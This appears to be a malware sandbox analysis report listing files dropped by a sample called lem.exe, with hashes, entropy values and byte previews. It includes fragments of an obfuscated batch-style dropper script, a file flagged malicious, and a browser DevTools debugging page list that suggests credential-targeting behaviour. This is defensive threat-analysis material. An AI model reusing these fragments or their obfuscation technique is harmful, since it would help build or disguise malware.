                                                                                                                                                                                                                                                                                          SSDEEP:96:NPgBOOzJMk67cY82SGrPVYRjDjXK2F6KJzLLwGXtXqWgrjj31jj6OzJMk67cY82s:UYwP62I+Wr3JjkwP62I+Ws
                                                                                                                                                                                                                                                                                          MD5:381138FA1B1C4C298AD2441898677ED6
                                                                                                                                                                                                                                                                                          SHA1:B8A0B0ECAAF6F3BBD7C27DD54ACD4BC3366DD0A4
                                                                                                                                                                                                                                                                                          SHA-256:D4EE07BC2183E3D013B68B080B9E2F603676B27F8B0C95CCA2ED533BC671FAFA
                                                                                                                                                                                                                                                                                          SHA-512:095C2B1C129C36125FE17ED096FDE58AE0F8AF61527D9AEDCAB379C3221BF09D87F28846E6FA3CF9FE05C750689A2ADFCDD1AB67409780A12A425A33219858EC
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly>.. <assemblyIdentity.. buildType="release".. language="neutral".. name="Microsoft-Windows-Authentication-AuthUI-Component".. processorArchitecture="*".. publicKeyToken="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration.. optimizePatterns="no".. offlineApply="no".. replacementSettingsVersionRange="0".. replacementVersionRange="6.2-10.0".. scope="MigWiz,Upgrade".. settingsVersion="0".. >.. <migXml xmlns="">.. <rules context="System">.. <include>.. <objectSet>.. Downlevel settings -->.. <pattern type="Registry">HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon [DefaultUserName]</pattern>.. <pattern type="Registry">HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon [DefaultDomainName]</pattern>.. <pattern type="Registry">HKLM\Software\Microsof
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):889
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.016955029110262
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:p/o2e8ZR+Vj3Xg0cjAkt3QbENgwnwJXMFhUK:22e8v+VrgfAbIggwJuX
                                                                                                                                                                                                                                                                                          MD5:2948FF1C0804EC7DB473BB77EB3FBE4E
                                                                                                                                                                                                                                                                                          SHA1:98A97AFC0E4E2B09A17AA0746F455DFD24356357
                                                                                                                                                                                                                                                                                          SHA-256:2F6B99F5915A462CAFF60950839E1498F12C9F8194DB3DA02251C5BD2CAD700E
                                                                                                                                                                                                                                                                                          SHA-512:8393B3AE7D44A4DD85D05D48768F9123910E603C477A3CACC6BF12D03D464959EC01A293B0B3317B0F8470A76D71F695098AE211DD6200D8F7F21E1C757F4EDA
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. language="neutral".. name="Microsoft-Windows-Security-NGC-PopKeySrv".. processorArchitecture="*".. version="0.0.0.0".. />.. <migration.. offlineApply="no".. scope="Upgrade,Data".. settingsVersion="3".. replacementSettingsVersionRange="0-2" .. >.. <migXml xmlns="">.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Control\Cryptography\Ngc\* [*]</pattern>.. </objectSet>.. </include>.. </rules>.. </migXml>.. </migration>..</assembly>..
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1267
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.353001736289951
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:OBfNaoCU9m0FA9m0TINePKllDCU9m0pRBfNaoCq7o0m7oABYpDCq7NBfNaoC6Kep:SfNaoCCsfTECCF/fNaoCqycCqPfNaoCw
                                                                                                                                                                                                                                                                                          MD5:DEBE7626296899F72FAD5FBECCB76A1F
                                                                                                                                                                                                                                                                                          SHA1:0F9B9100FB38213060C8FF1A7D99C51A15F1C5F7
                                                                                                                                                                                                                                                                                          SHA-256:C72E0BE0EADAD304165119FF99BC90D3925BC2FE2C27771912FC49131BBBE6AE
                                                                                                                                                                                                                                                                                          SHA-512:6DDF27771DB1578F432473AD9C1770A3750887566E2DB4E7C9BAFCB8CFD7823A7537947E4F0B828315564B2BDDD98ACCA91AA7C86D25DB2A6F532E0348F3177B
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/9CF2C1EBCB2168A1BBB29B208DDED844",.. "id": "9CF2C1EBCB2168A1BBB29B208DDED844",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/9CF2C1EBCB2168A1BBB29B208DDED844"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/534BC8FCC282FF1D709CDCDAE5935C33",.. "id": "534BC8FCC282FF1D709CDCDAE5935C33",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/534BC8FCC282FF1D709CDCDAE5935C33"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo
                                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                                          Size (bytes):947288
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.630612696399572
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                                                                                                                                                                                                                          MD5:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                                                                          SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                                                                                                                                                                                                                          SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                                                                                                                                                                                                                          SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                                                                                                                                          • Filename: Setup.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                          • Filename: SET_UP.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                          • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                          • Filename: SET_UP.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                          • Filename: Set-Up.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                          • Filename: OR8Ti8rf8h.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                          • Filename: nanophanotool.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                          • Filename: 5y2VCFOB05.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):369373
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.999479085447109
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:6144:FJQdJwo8s+9cpRF3C9Wa84DAX33LxQ7rB1Wkstu7pKLwmmdW2kaVXF2HPHKr2GH:FJQsANZ4cX37xqds2QcmAKaVXF2vqr2G
                                                                                                                                                                                                                                                                                          MD5:E805CD0F799D0AD76BDB49FAEF798D13
                                                                                                                                                                                                                                                                                          SHA1:41C8D79A6727403BBBB9B0E8D98887A3A7A8D8CB
                                                                                                                                                                                                                                                                                          SHA-256:B1F7C0ED244E054DD5EAE5FF022131ED9727543A4D0CDB6235C2D3723D2C4835
                                                                                                                                                                                                                                                                                          SHA-512:77A7560377610E97A103EE51E1945ACE4673F80D6F57A2475E613729474C9EB047C7088650EDB20FAA3862C67E274074E1DCEDB3646BFB4E5A91AC9E77EF6139
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:...NsRcjh...)H...=.q=+."..q.H..}...=/...=_X?...9U..]Q.d.,.h...G3..X.U.>'...>..#be... ..D.x....$8.@.[.w.5d..H.E.f,8f....R..>4.......-.g...QYQ..Q......./...b.]9.8.......V....\X.Z.FD.5.7....L.v..@.Uv....;..L..DE........d..&{[go.:...b....z........V..V.N..B...:.^.|mBdqj..nn$y.......w=U.P.r...ZA.1.5. u.Y...).7t.....MR?.....}2....LM...,.zUA..]......?.B.........F..(..Q.\.....\....?t).../..p6.?BD...A.A.\..XF....[5.......?%.'...O.">..........V:.zj.'.....6...E`W..W..O.7m....7.?.?.k..c....6...`c".....J....K.1o.!in.Rt0..ekl.....,.(Q!u.v.JX..a.x.......18...........L.N.!o......T........B...2.r..$.}... ^..s...=.)..2.K...Q3`.....R....T:oN.R.<2:`._.....|}.^M.o...I. .8...W.Z....C...i...YU...*..>.:?.'.`....#.@T.,B....V....,.`.5..G_.W....6........4D..Dk..?T..@.....y..-n..[.)$.D.X..y......G2.sF.....Om......t.!..j[...A.^.>.;...6'5P?..A....0.D%%"%.....;..d!.Q..SMm......z.$.......(.AD...]....D[=..TQ,..j.g.#.K`..6...(..."=6sr.<..ak.m.W..e]`.m.w....}.H..g.].m.f.J...H
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\lem.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):93184
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.160455964027194
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:AFfTubb1/Dde6YF640L6wy4Za9IN3YRYfv2j62SfuVGHj1vtK7h6R8anHsWccd0U:AFfTut/Dde6u640ewy4Za9coRC2jfTqH
                                                                                                                                                                                                                                                                                          MD5:7E00B549662A27E8F4A9DC5F950FD8E7
                                                                                                                                                                                                                                                                                          SHA1:ECBC302511819C0AF9BF7B990AA3623873AE2A2A
                                                                                                                                                                                                                                                                                          SHA-256:811039F826716917239C503F5797ABA4B57880E700B102F8C202DF9CA4C2AC37
                                                                                                                                                                                                                                                                                          SHA-512:C110B335341F09FF06E8AD0558E495356EE83452BE570BA60417859A2F371876D9F760E265F2146E42E328402336B96324DFE2B79CA494A5A77D926A169C72A1
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:......j.;.u.3.SSSSj...3.SSSSj.V....I._^3.[]...U..SVW.}...W.o...3..CS........>y*...Q..|2...L2.t..I8..A..|2...D2.t..@8.@...u....V....&..^..;.G..H..0...........@u.S....Au.j..L.....P.1.. .I............_^3.[]...U..SV.u.WV.......3..CS.........yM...Q..|:...L:.t..I8..A..|:...D:.t..@8.@...!.F..p.....\........j..v.......u..u.......&..^._^3.[]...U..SV.u.W...N..I..Y....F..H..N......V.]..(...j....|......By*...I..|9...T9.t..R8..B..|9...D9.t..@8.@...u.........&..F......G......j.0V..\.I.........r...t.3.Pj.V..@.I.....Pj.V..@.I.j..u.j.V....I._^3.[]...U..V.u........Q.E..E.....P...H.......j.............<......@..L0..|0..^t..I8Q.M....3.]...U..V.u....w...Q.E..E.....P...H....S...j...................@..L0..|0..^t..I8Q.M..+...3.]...U..V.u........Q.E..E.....P...H........j..................@..L0..|0..^t..I8Q.M.....3.]...U..V.u.......Q.E..E.....P...H.......j.............(......@..L0..|0..^t..I8Q.M..s...3.]...SVWj....j.......0y*...y..|7...L7.t..I8..A..|7...D7.t..@8.@.....+..4.I.......3.B..
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\lem.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):75776
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.144986056310104
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:BKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVSQsbZgar3R/OWel3z:BKaj6iTcPAsAhxjgarB/5el3z
                                                                                                                                                                                                                                                                                          MD5:7E6A03C749F54958AB60313137E6610E
                                                                                                                                                                                                                                                                                          SHA1:9F62D8F217558154E2DB9C970C1257C8E16DB6BD
                                                                                                                                                                                                                                                                                          SHA-256:CC3F1B74CF6DD7C88D42F5B29E089F1937613F8BB6E2274A94E7461B55795FF0
                                                                                                                                                                                                                                                                                          SHA-512:E555FA28C97E3618C6AC5903F735AC6919D69528F8A53E5DC0B3B546451A92C7797BC3945E60FCEE1A6550DB5C3E315C91DAE8FF94B1C0E1873EBB86AD38D085
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:........................................................................r.......................................................................................................................................................r.r.r.r.r.....................................................................................r...................................................................................r.............................................................................................................................................................................................................................................................................................................................r.r.....................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\lem.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):97280
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.5722629420970895
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:in+pqFqaynB6GMKY99z+ajU1Rjv18fRQLTh/5fhjLueoMmOrrHL/uDoiouK+r5bU:i+AqVnBypIbv18mLthfhnueoMmOqDoig
                                                                                                                                                                                                                                                                                          MD5:84B74DA383C7061D1F67A002DD8C47F7
                                                                                                                                                                                                                                                                                          SHA1:DC909E77B77059D86FD7FA99471F93029DD66A2F
                                                                                                                                                                                                                                                                                          SHA-256:1C9B9CC68B82CFC34B542CFDB143A9EAA6F63EC17065DF8608EAE27F8A667579
                                                                                                                                                                                                                                                                                          SHA-512:C09F0665456327859DC89C93C5D55289AFDF9657A226304D4871ED4C02DC26B8DDB7747941F136FD854C5A754E37299EB808288F80ABDF75CE1B0BF83AC82DE4
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:J..2S....P......P.....u......1...>3._.F.....^[....U..V.u....W.~..v..F..H..u....N.P...j...P......u......k1...>3._.F.....^]...U..E.VW.@..H..0.2...P...*...P.\....u......+1...>3._.F.....^]...U..V.u....W.~..v..F..H.......V.P.J..2.....P.......P.....u.......0...>3._.F.....^]...U....SVW.}.3.]..]..]..w....r!.G.j).H..M.......u......M.A......r..G.j).H.......u..W....E....r..O.j).I..k.....u..9....O.....E..I..(.....$..E..G..p....G....u..F..u..u....G.SQ.......P.x....u......./...>3._.F.....^[....U..M.3.9A.v..A....q..VWP......u....../...>3._.F.....^]...U.....e..SVW.}.........j...j.S.X....E.....x..v..@....Mq.....E..M.Q.M.Q.M.Q.M.Q.M.QP.............E.3..e..Fj..E.E.VPS.u..........M..#/...E.3.V.E.E.VPS.}.u..........M.......E.j..E.E.VPS.}.u.........M.......E.j..E.E.VPS.}.u.........M......E.j..E.E.VPS.}.u..].......M......8.......'.3.B.W....H..|1...D1.t..@8.P..|1...D1.t..@8.@.._^3.[....U........=.(M..SVW.L$.uA...@..|....T..t..R83.C.Z..|....T..t..R8.u....B.......3..^..>.Q.....(
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\lem.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (664), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):16713
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.13717215388457
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:TJpziSlvMGEoGA4CW1Shn9YeMNW8UGCTnUJ+9D7IEJ2Qxi1D:flkV7A4w9tMM8UGqUJtE0Qxi1D
                                                                                                                                                                                                                                                                                          MD5:DC0C5150CCFAA34C9472DF04D06B401E
                                                                                                                                                                                                                                                                                          SHA1:F7929242A75E8C48E0FD6FAF8688D2267A35F518
                                                                                                                                                                                                                                                                                          SHA-256:6A0790F679AEC429C210B455605E4169612C1371CC2CBABA0848CD788CF4D851
                                                                                                                                                                                                                                                                                          SHA-512:772F2826F31D04451D2774E9EF987C15E45C45309349FBE9EE7B130F46FB61DC428921D168FEADD74DA8DFA26C855B2C3831210B3511048B0966F1F4334472CD
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:Set Financing=I..ptNBull-Architectural-Languages-Bring-Cool-Reliance-..iCXIon-Investigator-..owXhDisciplinary-Faq-Eyed-..ehLeads-Belgium-Subject-..CfValentine-Threatened-Restoration-..SmKinase-Procurement-Cube-Told-..Set Pink=t..qmiEquipped-Verizon-Increases-Newer-Eg-Compromise-Plenty-Intel-..EELNike-Affected-..zjPharmaceuticals-Ja-..hsMovers-Televisions-..AmDDelivery-Awareness-Complaint-Preserve-Honors-Discussed-Miracle-Gabriel-..FJCombination-..Set Answering=H..vupEqually-Islands-..usAbilities-Updated-Rarely-Denial-Bidding-Dirt-Checked-..XoOFiscal-Optimal-Vast-Further-Affected-Wants-..RRThong-Edge-..HAUWhen-Synopsis-Becoming-..VqBuried-Kathy-Milan-Apollo-Sheer-..ghUSaudi-Mileage-Detection-Unity-Infinite-Eric-Usa-Lenses-..Set Launched=5..JMdMedieval-Mind-Foul-Infection-Baths-Efforts-..IwRComplicated-Metals-Preserve-Forever-Genes-Demonstrates-Ltd-Delhi-Envelope-..nVuEBritannica-Ff-Federation-Lakes-Romance-Porsche-Subsection-Balanced-..eVsQDefinitely-Letters-Assure-Avenue-Zdnet-Agents-S
                                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (664), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):16713
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.13717215388457
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:TJpziSlvMGEoGA4CW1Shn9YeMNW8UGCTnUJ+9D7IEJ2Qxi1D:flkV7A4w9tMM8UGqUJtE0Qxi1D
                                                                                                                                                                                                                                                                                          MD5:DC0C5150CCFAA34C9472DF04D06B401E
                                                                                                                                                                                                                                                                                          SHA1:F7929242A75E8C48E0FD6FAF8688D2267A35F518
                                                                                                                                                                                                                                                                                          SHA-256:6A0790F679AEC429C210B455605E4169612C1371CC2CBABA0848CD788CF4D851
                                                                                                                                                                                                                                                                                          SHA-512:772F2826F31D04451D2774E9EF987C15E45C45309349FBE9EE7B130F46FB61DC428921D168FEADD74DA8DFA26C855B2C3831210B3511048B0966F1F4334472CD
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:Set Financing=I..ptNBull-Architectural-Languages-Bring-Cool-Reliance-..iCXIon-Investigator-..owXhDisciplinary-Faq-Eyed-..ehLeads-Belgium-Subject-..CfValentine-Threatened-Restoration-..SmKinase-Procurement-Cube-Told-..Set Pink=t..qmiEquipped-Verizon-Increases-Newer-Eg-Compromise-Plenty-Intel-..EELNike-Affected-..zjPharmaceuticals-Ja-..hsMovers-Televisions-..AmDDelivery-Awareness-Complaint-Preserve-Honors-Discussed-Miracle-Gabriel-..FJCombination-..Set Answering=H..vupEqually-Islands-..usAbilities-Updated-Rarely-Denial-Bidding-Dirt-Checked-..XoOFiscal-Optimal-Vast-Further-Affected-Wants-..RRThong-Edge-..HAUWhen-Synopsis-Becoming-..VqBuried-Kathy-Milan-Apollo-Sheer-..ghUSaudi-Mileage-Detection-Unity-Infinite-Eric-Usa-Lenses-..Set Launched=5..JMdMedieval-Mind-Foul-Infection-Baths-Efforts-..IwRComplicated-Metals-Preserve-Forever-Genes-Demonstrates-Ltd-Delhi-Envelope-..nVuEBritannica-Ff-Federation-Lakes-Romance-Porsche-Subsection-Balanced-..eVsQDefinitely-Letters-Assure-Avenue-Zdnet-Agents-S
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\lem.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):90112
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.825606182838265
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:YYrDWyu0uZo2+9BGmdATGODv7xvTphAiPChgZ2kOEg:fWy4ZNoGmROL7F1G7ho2kOF
                                                                                                                                                                                                                                                                                          MD5:02B5952F3F0B3EF33C6AD0EE50BA13D3
                                                                                                                                                                                                                                                                                          SHA1:0F7F1A5C9AD674098B380962EDDFB8E2499C28CF
                                                                                                                                                                                                                                                                                          SHA-256:E17E9751D3E04A043DE086B4B26AE59A1DCF8B6C838FCC42B0CD2B47B807774C
                                                                                                                                                                                                                                                                                          SHA-512:1226748B8810BCE5665C43A0E8CF3F6585ED2A2A9B4DC93B9FE1BB301898CFA120C0FBDF96CA8B5E3C31960521836E87A7326F2AA4A374666D5A3B53277A048F
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:n.t.s. .a.r.e. .n.o.t. .a.l.l.o.w.e.d...".V.a.r.i.a.b.l.e. .m.u.s.t. .b.e. .o.f. .t.y.p.e. .".O.b.j.e.c.t."...1.T.h.e. .r.e.q.u.e.s.t.e.d. .a.c.t.i.o.n. .w.i.t.h. .t.h.i.s. .o.b.j.e.c.t. .h.a.s. .f.a.i.l.e.d...8.V.a.r.i.a.b.l.e. .a.p.p.e.a.r.s. .m.o.r.e. .t.h.a.n. .o.n.c.e. .i.n. .f.u.n.c.t.i.o.n. .d.e.c.l.a.r.a.t.i.o.n...2.R.e.D.i.m. .a.r.r.a.y. .c.a.n. .n.o.t. .b.e. .i.n.i.t.i.a.l.i.z.e.d. .i.n. .t.h.i.s. .m.a.n.n.e.r...1.A.n. .a.r.r.a.y. .v.a.r.i.a.b.l.e. .c.a.n. .n.o.t. .b.e. .u.s.e.d. .i.n. .t.h.i.s. .m.a.n.n.e.r.....C.a.n. .n.o.t. .r.e.d.e.c.l.a.r.e. .a. .c.o.n.s.t.a.n.t...5.C.a.n. .n.o.t. .r.e.d.e.c.l.a.r.e. .a. .p.a.r.a.m.e.t.e.r. .i.n.s.i.d.e. .a. .u.s.e.r. .f.u.n.c.t.i.o.n.........I.n.v.a.l.i.d. .f.i.l.e. .f.i.l.t.e.r. .g.i.v.e.n...*.E.x.p.e.c.t.e.d. .a. .v.a.r.i.a.b.l.e. .i.n. .u.s.e.r. .f.u.n.c.t.i.o.n. .c.a.l.l...1.".D.o.". .s.t.a.t.e.m.e.n.t. .h.a.s. .n.o. .m.a.t.c.h.i.n.g. .".U.n.t.i.l.". .s.t.a.t.e.m.e.n.t...2.".U.n.t.i.l.". .s.t.a.t.e.m.e.n.t. .w.i.t.h. .n.o. .m.a.t.c.
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\lem.exe
                                                                                                                                                                                                                                                                                          File Type:OpenPGP Public Key
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):57344
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.996798534009921
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:1536:OmBqjLBskqmgCub7WmH9DT1enI0Va/FJ2GkX5DMamIWSxEz:OmojLeN37ZH9f1eDAdo4tSK
                                                                                                                                                                                                                                                                                          MD5:3D3482F49381B6FD0830558DEC464625
                                                                                                                                                                                                                                                                                          SHA1:705C9181F55B2F4276D3689F8BED0EC25489877E
                                                                                                                                                                                                                                                                                          SHA-256:476B64C0A243B52CB8B4BEBA0634E77CD176FD1D15C8D8E08DB41B67585E7C1C
                                                                                                                                                                                                                                                                                          SHA-512:5777023FD4AF5D1A1DCF784E477D29B2B445BB73572D3D31208C4E5986A015FFA1D09AB65A709775723772FFF705F25F983BA228A72062F49D82964D18F9002B
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:..\.]...;p.A.,...l.4.I..96....."2q[e.p..ML.D..0.E.!.G.....1....-t+.~....8...E. w.....\.......q.R..+];D....#q..../m....[i..9....@..../..f.G.@.{.j..E./.n.B...n.&......%'Op....E#......$.bu&a.D....&&.17j.'}..ZG.~.@)...T."..*.....Z..._.j.cK...v[s.~...`!D)...x.,_..-..K:$LQ.e.A.....V.,2-%.V.H}I.?....?.....#..p.\%..TT...B.a..x.iM....{.....&8 .B.......s~...y\..:...?_......#/......,.Y.a.....$...3.4.X..I....(..3..B/wn.X.]..`bvD..4.l......S...1.,_.........:]n...?...PQL.X.NU.m.....u.V.D.".,....N.........'.N.R.....K..B.d......A.u..:2.d.....7.....w9.*...HN../&.#`.}.D.....;d.M..r'........%Z..-..[....Q..#.q.M...GS4`.4.......h.Z.....zl.$......_....P.........e.QdJD....|N..(.........ZbC./.L.Z.as8.A16.........*.....C`...6...^V.z!.a(s.BBa."... .;..x_.n.i.P...B.=...b.`....lU].;...HGkHvQ....H.k.zX.7.).7.K.ev.{..2..W..ob.]7...K...L..fc.%..a..s.;.U...9n'.o 4.R.=..N}..=|..gZ.4....::......3.....sf.$q..^k.2.N+..z........n...U...c.\vn.vrf...e..Yu><...zwk....=v.@D_~P.kC...e.V"3
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\lem.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):134144
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.674977789477399
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:1BRtNPnj0nEoXnmowS2u5hVOoQ7t8T6pUkBJR8CThpmESA:DNPj0nEo3tb2j6AUkB0CThp6A
                                                                                                                                                                                                                                                                                          MD5:8FEC4166BA86F7AC86DA9F06ABE49557
                                                                                                                                                                                                                                                                                          SHA1:5927648717AD20DBC2B9C1EB30CB5CF990182128
                                                                                                                                                                                                                                                                                          SHA-256:446CF37FD6B4C78C054185EC6D54823A0FDD3282FCA99B958B29E23CB4B075A0
                                                                                                                                                                                                                                                                                          SHA-512:A9812F1D24434ECABFC9F9781C29BED83B56619E544A21F018C454565A0EBA447B0B66B3F78ABE42BF227CC1F0E6959576328EA9F6A2776771CE7E5CD2F1E7C4
                                                                                                                                                                                                                                                                                          Malicious:false
